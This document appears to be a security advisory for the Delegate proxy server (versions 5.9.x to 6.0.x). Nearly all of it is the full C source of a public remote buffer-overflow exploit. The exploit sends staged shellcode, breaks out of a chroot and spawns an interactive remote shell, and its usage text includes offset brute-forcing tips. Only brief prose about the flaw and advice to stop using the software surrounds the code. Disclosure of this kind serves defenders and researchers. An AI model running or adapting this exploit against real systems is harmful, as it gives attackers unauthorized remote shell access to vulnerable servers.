COMMAND
Delegate
SYSTEMS AFFECTED
Delegate 5.9.x - 6.0.x
PROBLEM
Sebastian found following. Delegate, a multiple-service proxy
server contains several hundret buffer overflows and is horrible
insecure in general. Below is a demonstration exploit for just
one remotely exploitable buffer overflow for delegate, compiled on
linux (this bug is exploitable on several other platforms, too).
/* delefate.c
* delegate 5.9.x - 6.0.x remote exploit
*
* public
*
* will open a shell with the privileges of the nobody user.
*
* 1999/13/11 by scut of teso [http://teso.scene.at/]
*
* word to whole team teso, ADM, w00w00, beavuh and stealth :).
* special thanks to xdr for donating a bit of his elite debugging skillz.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
#define XP_OFFSET 0xbfffe074 /* offset */
unsigned long int xp_off = XP_OFFSET;
/* you don't have to modify this :) i hope :)
*/
#define XP_NETWORK_FD 12
#define XP_NETWORK_OFFSET 0x00000101 /* fixed relative network socket offset */
#define XP_SHELLCODE_OFFSET 0x00000104 /* fixed relative retaddr offset */
#define XP_DIFF 0x0000000e /* 14 bytes after XP_OFFSET starts the shellcode */
#define XP_SH2_FD1 0x00000011
#define XP_SH2_FD2 0x0000001d
#define XP_SH2_FD3 0x0000002a
#define GREEN "\E[32m"
#define BOLD "\E[1m"
#define NORMAL "\E[m"
#define RED "\E[31m"
/* local functions
*/
void usage (void);
void shell (int socket);
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
/* because the buffer is rather small (256 bytes), we use a minimalistic
* read() shellcode to increase the chances to hit a correct offet
*/
unsigned char shellcode1[] =
"\x77\x68\x6f\x69\x73\x3a\x2f\x2f\x61\x20\x62\x20\x31\x20\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90"
/* 30 byte read() shellcode by scut */
"\x33\xd2\x33\xc0\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x80\xc2"
"\x10\x03\xca\xc1\xc2\x04\xb0\x03\x33\xdb\xb3\x0c\xcd\x80"
/* ^^ network fd */
"\x82\xe0\xff\xbf" /* return address */
"\x0d\x0a";
/* uid+chroot-break+shell shellcode by lamerz, thanks !
* slightly modified by scut to take care of the network socket
*/
unsigned char shellcode2[]=
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x89\xd9"
"\xb3\x0c\xb0\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\xb0"
"\x3f\xcd\x80\x31\xc0\x31\xdb\x89\xd9\xb3\x0c\x41\x41\xb0\x3f\xcd"
"\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e"
"\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d"
"\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c"
"\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d"
"\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b"
"\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x6e\x67";
void
usage (void)
{
printf (GREEN BOLD "delefate - delegate 5.9.x, 6.0.x remote" NORMAL "\n"
"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n"
"usage.... : ./delefate <host> <port> [offset-add]\n"
"example.. : ./delefate localhost 8080 -100\n\n"
"for brute forcing, try from -2000 to 500 in steps of 200\n\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char **argv)
{
int socket;
char *server;
struct sockaddr_in sa;
unsigned short int port_dest;
unsigned char *retaddr_ptr;
unsigned long int offset;
unsigned char *stack = NULL;
if (argc < 3)
usage ();
printf (GREEN BOLD "delefate 5.9.x - 6.0.x remote exploit" NORMAL "\n"
"by " BOLD "scut" NORMAL " of " RED BOLD "team teso" NORMAL "\n\n");
if (argc == 4) {
long int xp_add = 0;
if (sscanf (argv[3], "%ld", &xp_add) != 1) {
usage ();
}
xp_off += xp_add;
}
printf (" " GREEN "-" NORMAL " using offset 0x%08x\n", xp_off);
server = argv[1];
port_dest = atoi (argv[2]);
/* do the offset
*/
retaddr_ptr = shellcode1 + XP_SHELLCODE_OFFSET;
offset = xp_off + XP_DIFF;
*retaddr_ptr = (offset & 0x000000ff) >> 0;
*(retaddr_ptr + 1) = (offset & 0x0000ff00) >> 8;
*(retaddr_ptr + 2) = (offset & 0x00ff0000) >> 16;
*(retaddr_ptr + 3) = (offset & 0xff000000) >> 24;
*(shellcode1 + XP_NETWORK_OFFSET) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD1) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD2) = (unsigned char) XP_NETWORK_FD;
*(shellcode2 + XP_SH2_FD3) = (unsigned char) XP_NETWORK_FD;
printf (" " GREEN "-" NORMAL " connecting to " GREEN "%s:%hu" NORMAL "...", server, port_dest);
fflush (stdout);
socket = net_connect (&sa, server, port_dest, 45);
if (socket <= 0) {
printf (" " RED BOLD "failed" NORMAL ".\n");
perror ("net_connect");
exit (EXIT_FAILURE);
}
printf (" " GREEN BOLD "connected." NORMAL "\n");
/* send minimalistic read() shellcode */
printf (" " GREEN "-" NORMAL " sending first shellcode...\n");
write (socket, shellcode1, strlen (shellcode1));
sleep (1);
/* now send the real shellcode :-) */
printf (" " GREEN "-" NORMAL " sending second shellcode...\n");
write (socket, shellcode2, strlen (shellcode2));
printf (" " GREEN "-" NORMAL " spawning shell...\n\n");
shell (socket);
close (socket);
exit (EXIT_SUCCESS);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr (host);
if (i == -1) {
he = gethostbyname (host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
/* original version by typo, modified by scut
*/
void
shell (int socket)
{
char io_buf[1024];
int n;
fd_set fds;
while (1) {
FD_SET (0, &fds);
FD_SET (socket, &fds);
select (socket + 1, &fds, NULL, NULL, NULL);
if (FD_ISSET (0, &fds)) {
n = read (0, io_buf, sizeof (io_buf));
if (n <= 0)
return;
write (socket, io_buf, n);
}
if (FD_ISSET (socket, &fds)) {
n = read (socket, io_buf, sizeof (io_buf));
if (n <= 0)
return;
write (1, io_buf, n);
}
}
}
int
net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
cs->sin_addr.s_addr = net_resolve (server);
if (cs->sin_addr.s_addr == 0) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
SOLUTION
No one didn't bothered to notify the author of delegate, since it
is impossible to make delegate secure short time (it contains over
1000 strcpy's and over 500 sprintf's). Just don't use delegate
anymore.